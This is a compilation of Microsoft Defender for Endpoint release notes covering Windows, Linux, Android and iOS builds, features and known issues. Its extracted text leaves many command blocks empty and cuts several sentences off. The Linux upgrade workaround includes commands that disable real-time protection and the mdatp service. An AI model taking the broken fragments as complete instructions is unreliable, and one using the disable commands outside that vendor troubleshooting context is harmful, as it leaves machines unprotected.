(Windows 11 SV 21H2)
Server 2022 (Iron) KB 5016693 10.8210.20348.946
Windows 10 20H2/21H1/21H2 KB 5016688 10.8210.19041.1949

Windows Server 20H2 (Vibranium)
Windows Server 2019 (RS5) KB 5016690 10.8210.17763.3346
What's new
Added a fix to resolve a missing intermediate certificate issue with the use of
"TelemetryProxyServer" on Windows Server 2012 R2 running the unified agent.
Enhanced Endpoint DLP with ability to protect password protected and encrypted
files and not label files.
Enhanced Endpoint DLP with support for context data in audit telemetry (short
evidence).
Improved Microsoft Defender for Endpoint client authentication support for VDI
devices.
Enhanced Microsoft Defender for Endpoint's ability to identify and intercept
ransomware and advanced attacks.
The Contain feature now supports more desktop and server versions to perform
the Contain action and block discovered devices when these are contained.
Expanded the troubleshooting mode feature to additional desktop and server
versions. For a complete list of supported OS versions and more information about
prerequisites, see Get started with troubleshooting mode in Microsoft Defender for
Endpoint.
Live Response improvements include reduced session creation latency when using
proxies, an undo Remediation manual command, support for OneDrive share in
FindFile action, and improved isolation and stability.
Security Management for Microsoft Defender for Endpoint now provides the ability
to sync the device configuration on demand instead of waiting for a specific
cadence.
７ Note
Update package KB5005292 is on a gradual rollout schedule through Windows

Update. Towards the end of this schedule, the package will be published
completely, including to the update catalog for manual download. For the current
release, this will be in the second half of October. If you want to test the package
sooner, you can use gradual rollout controls for platform updates to select the
Preview channel.
See also:

What's new in Defender for Endpoint on Linux
 Tip
Feedback

Endpoint on Linux
Article • 02/12/2024
Applies to:

This article is updated frequently to let you know what's new in the latest releases of
Microsoft Defender for Endpoint on Linux.

February-2024 (Build: 101.23122.0002 | Release version: 30.123122.0002.0)
February-2024 Build: 101.23122.0002 | Release

version: 30.123122.0002.0
Released: February 5,2024
Published: February 5,2024
Build: 101.23122.0002
Release version: 30.123122.0002.0
Engine version: 1.1.23100.2010
Signature version: 1.399.1389.0
What's new There are multiple fixes and new changes in this release:
Microsoft Defender for Endpoint on Linux now officially supports Mariner 2, Rocky
8.7 and higher, Alma 9.2 and higher version distros. If you already have Defender
for Endpoint running on any of these distros and facing any issues in the older
versions, please upgrade to the latest Defender for Endpoint version. Refer our
public deployment docs for more details.
Updated default engine version to 1.1.23100.2010 , and default signatures version
to 1.399.1389.0 .
General stability and performance improvements.
Bug fixes.
January-2024 (Build: 101.23112.0009 | Release version: 30.123112.0009.0)

January-2024 Build: 101.23112.0009 | Release
version: 30.123112.0009.0
Released: January 29,2024
Published: January 29, 2024
Build: 101.23112.0009
What's new
Updated default engine version to 1.1.23110.4 , and default signatures version to

1.403.1579.0 .

Bug fix for behavior monitoring configuration.
Bug fixes.
November-2023 (Build: 101.23102.0003 | Release version: 30.123102.0003.0)
November-2023 Build: 101.23102.0003 | Release

version: 30.123102.0003.0
Released: November 28,2023
Published: November 28,2023
Build: 101.23102.0003
What's new
Updated default engine version to 1.1.23090.2008 , and default signatures version

to 1.399.690.0 .
Updated libcurl library to version 8.4.0 to fix recently disclosed vulnerabilities with
the older version.
Updated Openssl library to version 3.1.1 to fix recently disclosed vulnerabilities
with the older version.
Bug fixes.

version: 30.123092.0012.0
Build: 101.23092.0012
What's new
There are multiple fixes and new changes in this release:
Support added to restore threat based on original path using the following
command:
Bash
sudo mdatp threat quarantine restore threat-path --path [threat-original-

path] --destination-path [destination-folder]
Starting with this release, Microsoft Defender for Endpoint on Linux will no longer
be shipping a solution for RHEL 6.
RHEL 6 'Extended end of life support' is poised to end by June 30, 2024 and
customers are advised to plan their RHEL upgrades accordingly aligned with
guidance from Red Hat. Customers who need to run Defender for Endpoint on
RHEL 6 servers can continue to leverage version 101.23082.0011 (does not expire
before June 30, 2024) supported on kernel versions 2.6.32-754.49.1.el6.x86_64 or
prior.
Engine Update to 1.1.23080.2007 and Signatures Ver: 1.395.1560.0 .
Streamlined device connectivity experience is now in public preview mode.
public blog
Performance improvements & bug fixes.
Known issues
CPU lock-up seen on kernel version 5.15.0-0.30.20 in ebpf mode, see Use eBPF-
based sensor for Microsoft Defender for Endpoint on Linux for details and
Mitigation options.
version: 30.123082.0011.0
Build: 101.23082.0011
What's new This new release is build over October 2023 release (`101.23082.0009``) with
addition of following changes. There's no change for other customers and upgrading is
optional.
Fix for immutable mode of auditd when supplementary subsystem is ebpf: In ebpf mode
all mdatp audit rules should be cleaned after switching to ebpf and rebooting. After
reboot, mdatp audit rules were not cleaned due to which it was resulting in hang of the
server. The fix cleans these rules, user should not see any mdatp rules loaded on reboot
Fix for MDE not starting up on RHEL 6.
Known issues
When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a
kernel hang. Run the following commands before attempting to upgrade to version
101.98.05. More information about the underlying issue can be found at System hang
due to blocked tasks in fanotify code .
There are two ways to mitigate this upgrade issue:
1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version.
Example:
Bash
sudo apt purge mdatp

sudo apt-get install mdatp
2. As an alternative you can follow the instructions to uninstall, then install the latest
version of the package.
If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before
upgrading. Some customers (<1%) experience issues with this method.
Bash
sudo mdatp config real-time-protection --value=disabled

sudo systemctl disable mdatp
October-2023 (Build: 101.23082.0009 | Release version: 30.123082.0009.0)
October-2023 Build: 101.23082.0009 | Release

version: 30.123082.0009.0
Released: October 9,2023
Published: October 9,2023
Build: 101.23082.0009
What's new
This new release is build over October 2023 release (`101.23082.0009``) with
addition of new CA Certificates. There's no change for other customers and
upgrading is optional.
Known issues
When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a
kernel hang. Run the following commands before attempting to upgrade to version
101.98.05. More information about the underlying issue can be found at System hang
due to blocked tasks in fanotify code .
Example:
Bash

Bash

October-2023 (Build: 101.23082.0006 | Release version: 30.123082.0006.0)
October-2023 Build: 101.23082.0006 | Release

version: 30.123082.0006.0
Released: October 9,2023
Published: October 9,2023
Build: 101.23082.0006
What's new
Feature updates and new changes

eBPF sensor is now the default supplementary event provider for endpoints
Microsoft Intune tenant attach feature is in public preview (as of mid July)
You must add "*.dm.microsoft.com" to firewall exclusions for the feature to
work correctly
Defender for Endpoint is now available for Debian 12 and Amazon Linux 2023
Support to enable Signature verification of updates downloaded
Note that you must update the manajed.json as shown below
"features":{
"OfflineDefinitionUpdateVerifySig":"enabled"
}
Prerequisite to enable feature

Engine version on the device must be "1.1.23080.007" or above. Check
your engine version by using the following command. mdatp health --
field engine_version
Option to support monitoring of NFS and FUSE mount points. These are
ignored by default. The following example shows how to monitor all filesystem
while ignoring only NFS:
"antivirusEngine": {
"unmonitoredFilesystems": ["nfs"]
}
Example to monitor all filesystems including NFS and FUSE:
"antivirusEngine": {
"unmonitoredFilesystems": []
}
Other performance improvements

Bug Fixes
Known issues
When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter
a kernel hang. Run the following commands before attempting to upgrade to
version 101.98.05. More information about the underlying issue can be found at
System hang due to blocked tasks in fanotify code . There are two ways to
mitigate this upgrade issue:
Example:
Bash

Bash
September-2023 (Build: 101.23072.0021 | Release version: 30.123072.0021.0)
September-2023 Build: 101.23072.0021 | Release

version: 30.123072.0021.0
Released: September 11,2023
Published: September 11,2023
Build: 101.23072.0021
What's new
There are multiple fixes and new changes in this release

In mde_installer.sh v0.6.3, users can use the --channel argument to provide the
channel of the configured repository during cleanup. For example, sudo
./mde_installer --clean --channel prod
The Network Extension can now be reset by administrators using mdatp

network-protection reset .

Bug Fixes
Known issues
While upgrading from mdatp version 101.75.43 or 101.78.13 , you might

encounter a kernel hang. Run the following commands before attempting to
upgrade to version 101.98.05 . For more information, see System hang due to
blocked tasks in fanotify code .
Example:
Bash

Bash

July-2023 (Build: 101.23062.0010 | Release version: 30.123062.0010.0)
July-2023 Build: 101.23062.0010 | Release

version: 30.123062.0010.0
Released: July 26,2023
Published: July 26,2023
Build: 101.23062.0010
What's new

If a proxy is set for Defender for Endpoint, then it's visible in the mdatp health
command output
With this release we provided two options in mdatp diagnostic hot-event-
sources:
1. Files
2. Executables
Network Protection: Connections that are blocked by Network Protection and

have the block overridden by users are now correctly reported to Microsoft
Defender XDR
Improved logging in Network Protection block and audit events for debugging
Other fixes and improvements

From this version, enforcementLevel are in passive mode by default giving
admins more control over where they want 'RTP on' within their estate
This change only applies to fresh MDE deployments, for example, servers where
Defender for Endpoint is being deployed for the first time. In update scenarios,
servers that have Defender for Endpoint deployed with RTP ON, continue
operating with RTP ON even post update to version 101.23062.0010
Bug Fixes
RPM database corruption issue in Defender Vulnerability Management baseline
has been fixed
Known issues

Example:
Bash

Bash

July-2023 (Build: 101.23052.0009 | Release version: 30.123052.0009.0)

July-2023 Build: 101.23052.0009 | Release
version: 30.123052.0009.0
Released: July 10,2023
Published: July 10,2023
Build: 101.23052.0009
What's new
There are multiple fixes and new changes in this release - The build version schema
is updated from this release. While the major version number remains same as 101,
the minor version number now has five digits followed by four digit patch number
that is, 101.xxxxx.yyy - Improved Network Protection memory consumption under
stress
Updated the engine version to 1.1.20300.5 and signature version to
1.391.2837.0 .
Bug fixes.
Known issues

Example:
Bash

Bash

June-2023 (Build: 101.98.89 | Release version: 30.123042.19889.0)
June-2023 Build: 101.98.89 | Release version:

30.123042.19889.0
Released: June 12,2023
Published: June 12, 2023
Build: 101.98.89
What's new

Improved Network Protection Proxy handling.
In Passive mode, Defender for Endpoint no longer scans when Definition update
happens.
Devices continue to be protected even after Defender for Endpoint agent has
expired. We recommend upgrading the Defender for Endpoint Linux agent to
the latest available version to receive bug fixes, features and performance
improvements.
Removed semanage package dependency.
Bug fixes.
Known issues


Example:
Bash

Bash

May-2023 (Build: 101.98.64 | Release version: 30.123032.19864.0)
May-2023 Build: 101.98.64 | Release version:

30.123032.19864.0
Released: May 3,2023
Published: May 3, 2023
Build: 101.98.64
What's new

Health message improvements to capture details about auditd failures.
Improvements to handle augenrules, which was causing installation failure.
Periodic memory cleanup in engine process.
Fix for memory issue in mdatp audisp plugin.
Handled missing plugin directory path during installation.
When conflicting application is using blocking fanotify, with default
configuration mdatp health shows unhealthy. This is now fixed.
Support for ICMP traffic inspection in BM.
Bug fixes.
Known issues

Example:
Bash

upgrading. Caution: Some customers (<1%) experience issues with this method.
Bash

April-2023 (Build: 101.98.58 | Release version: 30.123022.19858.0)
April-2023 Build: 101.98.58 | Release version:

30.123022.19858.0
Released: April 20,2023
Published: April 20, 2023
Build: 101.98.58
What's new

Logging and error reporting improvements for auditd.
Handle failure in reload of auditd configuration.
Handling for empty auditd rule files during MDE install.
Addressed a health issue in mdatp that occurs due to selinux denials.
Bug fixes.
Known issues
While upgrading mdatp to version 101.94.13 or later, you might notice that health
is false, with health_issues as "no active supplementary event provider". This can
happen due to misconfigured/conflicting auditd rules on existing machines. To
mitigate the issue, the auditd rules on the existing machines need to be fixed. The
following commands can help you to identify such auditd rules (commands need
to be run as super user). Take a backup of following file:
/etc/audit/rules.d/audit.rules as these steps are only to identify failures.
Bash
echo -c >> /etc/audit/rules.d/audit.rules

augenrules --load
While upgrading from mdatp version 101.75.43 or 101.78.13 , you could

Example:
Bash

upgrading. Caution: Some customers (<1%) experience issues with this method.
Bash

March-2023 (Build: 101.98.30 | Release version: 30.123012.19830.0)
March-2023 Build: 101.98.30 | Release version:

30.123012.19830.0
Released: March , 20,2023
Published: March 20, 2023
Build: 101.98.30
What's new
This new release is build over March 2023 release (`101.98.05``) with a fix for Live
response commands failing for one of our customers. There's no change for other
customers and upgrade is optional.
Known issues
With mdatp version 101.98.30 you might see a health false issue in some of the
cases, because SELinux rules aren't defined for certain scenarios. The health
warning could look something like this:
found SELinux denials within last one day. If the MDATP is recently installed, clear the
existing audit logs or wait for a day for this issue to autoresolve. Use command: "sudo
ausearch -i -c 'mdatp_audisp_pl' | grep "type=AVC" | grep " denied" to find details
The issue could be mitigated by running the following commands.
sudo ausearch -c 'mdatp_audisp_pl' --raw | sudo audit2allow -M my-

mdatpaudisppl_v1
sudo semodule -i my-mdatpaudisppl_v1.pp
Here, my-mdatpaudisppl_v1 represents the policy module name. After you run the
commands, either wait for 24 hours or clear/archive the audit logs. The audit logs could
be archived by running the following command
sudo service auditd stop

sudo systemctl stop mdatp
cd /var/log/audit
sudo gzip audit.*
sudo service auditd start
sudo systemctl start mdatp
mdatp health
In case the issue reappears with some different denials. We need to run the mitigation
again with a different module name (for example, my-mdatpaudisppl_v2).
March-2023 (Build: 101.98.05 | Release version: 30.123012.19805.0)
March-2023 (Build: 101.98.05 | Release version:

30.123012.19805.0)
Released: March , 08,2023
Published: March 08, 2023
Build: 101.98.05
What's new
There are multiple fixes and new changes in this release.
Improved Data Completeness for Network Connection events

Improved Data Collection capabilities for file ownership/permissions changes
seManage in part of the package, to that seLinux policies can be configured in
different distro (fixed).
Improved enterprise daemon stability
AuditD stop path clean-up
Improved the stability of mdatp stop flow.
Added new field to wdavstate to keep track of platform update time.
Stability improvements to parsing Defender for Endpoint onboarding blob.
Scan doesn't proceed if a valid license isn't present (fixed)
Added performance tracing option to xPlatClientAnalyzer, with tracing enabled
mdatp process dumps the flow in all_process.zip file that can be used for analysis
of performance issues.
Added support in Defender for Endpoint for the following RHEL-6 kernel versions:
2.6.32-754.43.1.el6.x86_64
2.6.32-754.49.1.el6.x86_64
Other fixes
Known issues
While upgrading mdatp to version 101.94.13, you might notice that health is false,
with health_issues as "no active supplementary event provider". This can happen
due to misconfigured/conflicting auditd rules on existing machines. To mitigate the
issue, the auditd rules on the existing machines need to be fixed. The following
steps can help you to identify such auditd rules (these commands need to be run
as super user). Make sure to back up following file: `/etc/audit/rules.d/audit.rules``
as these steps are only to identify failures.
Bash

augenrules --load

blocked tasks in fanotify code
There are two ways to mitigate the problem in upgrading.
Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version.
Example:
Bash

As an alternative, you can follow the instructions to uninstall, then install the latest
In case you don't want to uninstall mdatp you can disable rtp and mdatp in sequence
before upgrade. Caution: Some customers(<1%) are experiencing issues with this
method.
Bash

Jan-2023 (Build: 101.94.13 | Release version: 30.122112.19413.0)
Jan-2023 (Build: 101.94.13 | Release version:

30.122112.19413.0)
Released: January 10, 2023
Published: January 10, 2023
Build: 101.94.13
What's new

Skip quarantine of threats in passive mode by default.
New config, nonExecMountPolicy, can now be used to specify behavior of RTP
on mount point marked as noexec.
New config, unmonitoredFilesystems, can be used to unmonitor certain
filesystems.
Improved performance under high load and in speed test scenarios.
Fixes an issue with accessing SMB shares behind Cisco AnyConnect VPN
connections.
Fixes an issue with Network Protection and SMB.
lttng performance tracing support.
TVM, eBPF, auditd, telemetry and mdatp cli improvements.
mdatp health now reports behavior_monitoring
Other fixes.
Known issues
While upgrading mdatp to version 101.94.13 , you might notice that health is false,
with health_issues as "no active supplementary event provider". This can happen
due to misconfigured/conflicting auditd rules on existing machines. To mitigate the
issue, the auditd rules on the existing machines need to be fixed. The following
steps can help you to identify such auditd rules (these commands need to be run
as super user). Take a backup of following file: /etc/audit/rules.d/audit.rules as
these steps are only to identify failures.
Bash

augenrules --load

upgrade to version 101.94.13. For more information, see System hang due to
Example:
Bash

As an alternative to the above, you can follow the instructions to uninstall, then install
the latest version of the package.
method.
Bash

Nov-2022 (Build: 101.85.27 | Release version: 30.122092.18527.0)
Nov-2022 (Build: 101.85.27 | Release version:

30.122092.18527.0)
Released: November 02, 2022
Published: November 02, 2022
Build: 101.85.27
What's new

V2 engine is default with this release and V1 engine bits are removed for
enhanced security.
V2 engine support configuration path for AV definitions. (mdatp definition set
path)
Removed external packages dependencies from MDE package. Removed
dependencies are libatomic1, libselinux, libseccomp, libfuse, and libuuid
In case crash collection is disabled by configuration, crash monitoring process
isn't launched.
Performance fixes to optimally use system events for AV capabilities.
Stability improvement when restarting mdatp and load epsext issues.
Other fixes
Known issues

upgrade to version 101.85.21. For more information, see System hang due to
Example:
Bash

As an alternative approach, follow the instructions to uninstall, then install the latest
method.
Bash

Sep-2022 (Build: 101.80.97 | Release version: 30.122072.18097.0)
Sep-2022 (Build: 101.80.97 | Release version:

30.122072.18097.0)
Released: September 14, 2022
Published: September 14, 2022
Build: 101.80.97
What's new
Fixes a kernel hang observed on select customer workloads running mdatp version
101.75.43 . After RCA, this was attributed to a race condition while releasing the
ownership of a sensor file descriptor. The race condition was exposed due to a
recent product change in the shutdown path. Customers on newer Kernel versions
(5.1+) aren't impacted by this issue. For more information, see System hang due to
Known issues
When upgrading from mdatp version 101.75.43 or 101.78.13 , you might

upgrade to version 101.80.97 . This action should prevent the issue from occurring.

After executing the commands, use your package manager to perform the upgrade.
As an alternative approach, follow the instructions to uninstall, then install the latest
Aug-2022 (Build: 101.78.13 | Release version: 30.122072.17813.0)
Aug-2022 (Build: 101.78.13 | Release version:

30.122072.17813.0)
Released: August 24, 2022
Published: August 24, 2022
Build: 101.78.13
What's new
Rolled back due to reliability issues

Aug-2022 (Build: 101.75.43 | Release version: 30.122071.17543.0)

30.122071.17543.0)
Published: August 2, 2022
Build: 101.75.43
What's new
Added support for Red Hat Enterprise Linux version 9.0

Added a new field in the output of mdatp health that can be used to query the
enforcement level of the network protection feature. The new field is called
network_protection_enforcement_level and can take one of the following values:
audit , block , or disabled .
Addressed a product bug where multiple detections of the same content could
lead to duplicate entries in the threat history
Addressed an issue where one of the processes spawned by the product
( mdatp_audisp_plugin ) was sometimes not properly terminated when the service
was stopped
Other bug fixes
Jul-2022 (Build: 101.73.77 | Release version: 30.122062.17377.0)
Jul-2022 (Build: 101.73.77 | Release version:

30.122062.17377.0)
Released: July 21, 2022
Published: July 21, 2022
Build: 101.73.77
What's new
Added an option to configure file hash computation

From this build onwards, the product has the new antimalware engine by default
Performance improvements for file copy operations
Bug fixes
Jun-2022 (Build: 101.71.18 | Release version: 30.122052.17118.0)
Released: June 24, 2022

Published: June 24, 2022
Build: 101.71.18
What's new
Fix to support definitions storage in nonstandard locations (outside of /var) for v2

definition updates
Fixed an issue in the product sensor used on RHEL 6 that could lead to an OS hang
mdatp connectivity test was extended with an extra URL that the product
requires to function correctly. The new URL is https://go.microsoft.com/fwlink/?

linkid=2144709 .
Up until now, the product log level wasn't persisted between product restarts.
Beginning with this version, there's a new command-line tool switch that persists
the log level. The new command is mdatp log level persist --level <level> .
Removed the dependency on python from the product installation package
Performance improvements for file copy operations and processing of network
events originating from auditd
Bug fixes
May-2022 (Build: 101.68.80 | Release version:

30.122042.16880.0)
Released: May 23, 2022
Build: 101.68.80
What's new
Added support for kernel version 2.6.32-754.47.1.el6.x86_64 when running on

RHEL 6
On RHEL 6, product can now be installed on devices running Unbreakable
Enterprise Kernel (UEK)
Fixed an issue where the process name was sometimes incorrectly displayed as
unknown when running mdatp diagnostic real-time-protection-statistics
Fixed a bug where the product sometimes was incorrectly detecting files inside the
quarantine folder
Fixed an issue where the mdatp command-line tool wasn't working when /opt was
mounted as a soft-link
Performance improvements & bug fixes

30.122032.16577.0)
Build: 101.65.77
What's new
Improved the conflicting_applications field in mdatp health to show only the

most recent 10 processes and also to include the process names. This makes it
easier to identify which processes are potentially conflicting with Microsoft
Defender for Endpoint for Linux.
Bug fixes
Mar-2022 (Build: 101.62.74 | Release version: 30.122022.16274.0)

Released: Mar 24, 2022
Published: Mar 24, 2022
Build: 101.62.74
What's new
Addressed an issue where the product would incorrectly block access to files
greater than 2 GB in size when running on older kernel versions
Bug fixes
Mar-2022 (Build: 101.60.93 | Release version:

30.122012.16093.0)
Build: 101.60.93
What's new
This version contains a security update for CVE-2022-23278

Build: 101.60.05
What's new
Added support for kernel version 2.6.32-754.43.1.el6.x86_64 for RHEL 6.10

Bug fixes
Feb-2022 (Build: 101.58.80 | Release version: 30.122012.15880.0)
Feb-2022 (Build: 101.58.80 | Release version:

30.122012.15880.0)
Released: Feb 20, 2022
Published: Feb 20, 2022
Build: 101.58.80
What's new
The command-line tool now supports restoring quarantined files to a location

other than the one where the file was originally detected. This can be done
through mdatp threat quarantine restore --id [threat-id] --path [destination-
folder] .
Beginning with this version, network protection for Linux can be evaluated on
demand
Bug fixes
Jan-2022 (Build: 101.56.62 | Release version: 30.121122.15662.0)

30.121122.15662.0)
Released: Jan 26, 2022
Published: Jan 26, 2022
Build: 101.56.62
What's new
Fixed a product crash introduced in 101.53.02 and that has impacted multiple
customers
Jan-2022 (Build: 101.53.02 | Release version: (30.121112.15302.0)

Build: 101.53.02
What's new

2021 releases
(Build: 101.52.57 | Release version: 30.121092.15257.0)
Build: 101.52.57
What's new
Added a capability to detect vulnerable log4j jars in use by Java applications. The
machine is periodically inspected for running Java processes with loaded log4j jars.
The information is reported to the Microsoft Defender for Endpoint backend and is
exposed in the Vulnerability Management area of the portal.
Build: 101.47.76
What's new
Added a new switch to the command-line tool to control whether archives are scanned
during on-demand scans. This can be configured through mdatp config scan-archives --
value [enabled/disabled]. By default, this setting is set to enabled.
Bug fixes
Build: 101.45.13
What's new
Beginning with this version, we're bringing Microsoft Defender for Endpoint
support to the following distros:
RHEL6.7-6.10 and CentOS6.7-6.10 versions.
Amazon Linux 2
Fedora 33 or higher
Bug fixes
Build: 101.45.00
What's new
Added new switches to the command-line tool:

Control degree of parallelism for on-demand scans. This can be configured
through mdatp config maximum-on-demand-scan-threads --value [number-
between-1-and-64] . By default, a degree of parallelism of 2 is used.
Control whether scans after security intelligence updates are enabled or

disabled. This can be configured through mdatp config scan-after-definition-
update --value [enabled/disabled] . By default, this setting is set to enabled .
Changing the product log level now requires elevation

Bug fixes
Build: 101.39.98
What's new

Build: 101.34.27
What's new

Build: 101.29.64
What's new
Beginning with this version, threats detected during on-demand antivirus scans
triggered through the command-line client are automatically remediated. Threats
detected during scans triggered through the user interface still require manual
action.
mdatp diagnostic real-time-protection-statistics now supports two more
switches:
--sort : sorts the output descending by total number of files scanned
--top N : displays the top N results (only works if --sort is also specified)

Build: 101.25.72
What's new
Microsoft Defender for Endpoint on Linux is now available in preview for US

Government customers. For more information, see Microsoft Defender for Endpoint for
US Government customers.
Fixed an issue where usage of Microsoft Defender for Endpoint on Linux on

systems with FUSE filesystems was leading to OS hang
Performance improvements & other bug fixes
Build: 101.25.63
What's new

Build: 101.23.64
What's new
Performance improvement for the situation where an entire mount point is added to the
antivirus exclusion list. Prior to this version, the product processed file activity
originating from the mount point. Beginning with this version, file activity for excluded
mount points is suppressed, leading to better product performance
Added a new option to the command-line tool to view information about the last
on-demand scan. To view information about the last on-demand scan, run mdatp
health --details antivirus
Other performance improvements & bug fixes

(Build: 101.18.53)
Build: 101.18.53
What's new
EDR for Linux is now generally available
Added a new command-line switch ( --ignore-exclusions ) to ignore AV exclusions

during custom scans ( mdatp scan custom )
Extended mdatp diagnostic create with a new parameter ( --path [directory] )
that allows the diagnostic logs to be saved to a different directory
Feedback

Endpoint on Android
Article • 10/25/2023
Applies to:

） Important
Microsoft Defender for Endpoint's Anti malware engine is now generally available.
All the users are required to have a Microsoft Defender for Endpoint version
1.0.3815.0000 or later to utilize this new malware protection capability. Users on
Microsoft Defender for Endpoint earlier than version 1.0.3815.0000 are sent
notifications and in-app overlay messages to update their Microsoft Defender for
Endpoint application. Users can click on the link provided in the overlay message to
go to the managed play store and update the application.
If users can't access the play store, the app can be updated through the company
portal.
Device Tagging
Mobile Device Tagging is now generally available. This feature enables bulk tagging the
mobile devices by allowing the admins to set up tags via Intune. Admin can configure
the device tags through Intune via configuration policies and push them to user's
devices. Once the user installs and activates Defender, the client app passes the device
tags to the Security Portal. The Device tags appear against the devices in the Device
Inventory.
This configuration is available for both the enrolled (MDM) devices and unenrolled
(MAM) devices. For more information, see Device Tagging (MDM) and Device Tagging
(MAM).
Microsoft Defender for Endpoint on Company-
owned personally enabled devices
MDE is now generally available on AE COPE devices. Enterprises can onboard devices on
COPE mode and push MDE to user's devices through the Microsoft Intune admin
center . With this support, Android Enterprise COPE devices get the full capabilities of
our offering on Android, including:
Phishing and web protection.

Malware scanning.
Network protection (preview).
Additional breach prevention through integration with Microsoft Intune and
Conditional Access.
Read the announcement here .
Privacy Controls
Microsoft Defender for Endpoint on Android enables Privacy Controls for both the
Admins and the End Users. This includes the controls for enrolled (MDM) and unenrolled
(MAM) devices. Admins can configure the privacy in the alert report while End Users can
configure the information shared to their organization. For more information, see
privacy controls(MDM) and privacy controls (MAM).
Optional Permissions and Disable Web

Protection
Microsoft Defender for Endpoint on Android enables Optional Permissions in the
onboarding flow. Currently the permissions required by MDE are mandatory in the
onboarding flow. With this feature, admin can deploy MDE on devices without enforcing
the mandatory VPN and Accessibility permissions during onboarding. End Users can
onboard the app without the mandatory permissions and can later review these
permissions. This feature is currently present only for unenrolled devices (MAM). For
more information, see optional permissions.
Microsoft Defender on Android enterprise

BYOD personal profile
Microsoft Defender for Endpoint is now supported on Android Enterprise personal
profile (BYOD only) with all the key features including malware scanning, protection
from phishing links, network protection and vulnerability management. This support is
coupled with privacy controls to ensure user privacy on personal profile. For more
information, read the announcement and the deployment guide.
Network protection
Network Protection on Microsoft Defender for Endpoint is now available. Network
protection provides protection against rogue Wi-Fi related threats, rogue hardware like
pineapple devices and notifies the user if a related threat is detected. Users also see a
guided experience to connect to secure networks and change networks when they're
connected to an unsecure connection.
It includes several admin controls to offer flexibility, such as the ability to configure the
feature from within the Microsoft Intune admin center. Admins can also enable privacy
controls to configure the data that's sent by Defender for Endpoint from Android
devices. For more information, see network protection.
７ Note
Microsoft Defender is no longer supported for versions 1.0.3011.0302 or earlier.

Users are requested to upgrade to latest versions to keep their devices secure.
To update, users can use the following steps:
1. On your work profile, go to Managed Play Store.

2. Tap on the profile icon on the top right corner and select "Manage apps and
device".
3. Locate MDE under updates available and select update. If you encounter any
issues, submit in-app feedback.
Microsoft Defender for Endpoint is now

Microsoft Defender in the Play store
Microsoft Defender for Endpoint is now available as Microsoft Defender in the play
store. With this update, the app is available as preview for Consumers in the US region.
Based on how you log into the app with your work or personal account, you have access
to features for Microsoft Defender for Endpoint or for Microsoft Defender for
individuals. For more information, see this blog .
Vulnerability Management
On January 25, 2022, we announced the general availability of Vulnerability
management on Android and iOS. For more information, see the techcommunity post
here .
Upcoming permission changes for Microsoft

Defender for Endpoint running Android 11 or
later (Nov 2021)
Release Build: 1.0.3501.0301 Release month: Nov 2021 Microsoft Defender for Endpoint
has released this update required by Google to upgrade to Android API 30. This
change prompts users seeking access to new storage permission , for devices running
Android 11 or later. Users need to accept this new storage permission once they update
Defender app with the release build 1.0.3501.0301 or later. This update ensures that
Defender for Endpoint's app security feature to function without any disruption. For
more information, review the following sections.
How will this affect your organization: These changes take effect if you're using
Microsoft Defender for Endpoint on devices running Android 11 or later and updated
Defender for Endpoint to release build 1.0.3501.0301 or later.
７ Note
The new storage permissions cannot be configured by admin to 'Auto Approve'

through Microsoft Intune. User will need to take action to provide access to this
permission.
User experience: Users receive a notification indicating a missing permission for

app security. If the user denies this permission, the 'App security' functionality is
turned off on the device. If user doesn't accept or deny permission, they'll continue
to receive the prompt when unlocking their device or opening the app, until it has
been approved.
７ Note
If your organization is previewing 'Tamper protection' feature and if the new

storage permissions are not granted by the user within 7 days of updating to the
latest version, the user might lose access to corporate resources.
What you need to do to prepare:
Notify your users and helpdesk (as applicable) that users will need to accept the new
permissions when prompted after they have updated Defender for Endpoint to build
1.0.3501.0301 or later version. To accept the permissions, users should:
1. Tap on the Defender for Endpoint in-app notification or open the Defender for
Endpoint app. Users see a screen that lists the permissions needed. A green check
mark is missing next to the Storage permission.
2. Tap Begin.
3. Tap the toggle for Allow access to manage all files.
4. The device is now protected.
７ Note
This permission allows Microsoft Defender for Endpoint to access storage on user's
device, which helps detect and remove malicious and unwanted apps. Microsoft
Defender for Endpoint accesses/scans Android app package file (.apk) only. On
devices with a Work Profile, Defender for Endpoint only scans work-related files.
 Tip
Feedback

Endpoint on iOS
Article • 01/05/2024
Applies to:

Device Tagging
Mobile Device Tagging is now generally available. This feature enables bulk tagging the
mobile devices by allowing the admins to set up tags via Intune. Admin can configure
the device tags through Intune via configuration policies and push them to user's
devices. Once the User installs and activates Defender, the client app passes the device
tags to the Security Portal. The Device tags appear against the devices in the Device
Inventory. For more information, read Configure Device Tagging.
Vulnerability assessment of apps

Vulnerability assessment of apps on Microsoft Defender for Endpoint for iOS is now
generally available. Defender for Endpoint on iOS supports vulnerability assessments of
apps only for enrolled (MDM) devices. For more information, see Configure vulnerability
assessment of apps.
Network protection
Network Protection on Microsoft Defender for Endpoint is now generally available.
Network protection provides protection against rogue Wi-Fi related threats, rogue
hardware like pineapple devices and notifies the user if a related threat is detected.
Users also see a guided experience to connect to secure networks and change networks
when they're connected to an unsecure connection.
feature from within the Microsoft Intune admin center. Admins can also enable privacy
controls to configure the data that's sent by Defender for Endpoint from iOS devices.
For more information, read Configure Network Protection.
Privacy Controls
Microsoft Defender for Endpoint on iOS enables Privacy Controls for both the Admins
and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM)
devices. Admins can configure the privacy in the phish alert report while End Users can
configure the information shared to their organization.
Optional Permissions and Disable Web

Protection
Microsoft Defender for Endpoint on iOS enables Optional Permissions in the
onboarding flow. With this feature, admin can deploy MDE on BYOD devices without
enforcing the mandatory VPN Permission during onboarding. End Users can onboard
the app without the mandatory permissions and can later review these permissions. This
feature is currently present only for enrolled devices (MDM).
With Disable Web Protection, customers who don't want to set up a VPN can configure
to disable Web Protection and deploy MDE without that feature. Other MDE features
will continue to work. This configuration is available for both the enrolled (MDM)
devices and unenrolled (MAM) devices.
Integration with Tunnel

Microsoft Defender for Endpoint on iOS can now integrate with Microsoft Tunnel, a VPN
gateway solution to enable security and connectivity in a single app. Integration with
Tunnel provides a simpler, secure VPN experience on iOS with just one app. This feature
was earlier available only on Android. For more information, see the techcommunity
post here
Improved experience on supervised iOS devices

Microsoft Defender for Endpoint on iOS now has specialized ability on supervised
iOS/iPadOS devices, given the increased management capabilities provided by the
